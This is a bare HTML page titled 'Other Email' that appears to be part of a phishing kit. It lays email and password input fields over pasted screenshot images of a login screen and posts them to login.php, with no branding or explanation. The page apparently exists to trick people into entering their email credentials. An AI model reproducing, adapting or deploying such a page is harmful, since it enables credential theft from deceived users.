<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Other Email</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:334px; top:0px; width:594px; height:541px; z-index:0"><img src="images/paste11.jpg" alt="" title="" border=0 width=594 height=541></div>

<div id="image2" style="position:absolute; overflow:hidden; left:908px; top:485px; width:50px; height:47px; z-index:1"><img src="images/paste12.jpg" alt="" title="" border=0 width=50 height=47></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:388px;left:493px;top:167px;z-index:3;height: 46px;" placeholder="Email">
<input name="formtext2" type="Password" style="position:absolute;width:388px;left:493px;top:265px;z-index:4;height: 46px;" placeholder="Password">
<div id="formimage1" style="position:absolute; left:687px; top:345px; z-index:5"><input type="image" name="formimage1" width="201" height="70" src="images/s.JPG"></div>
</form>


</body>
</html>
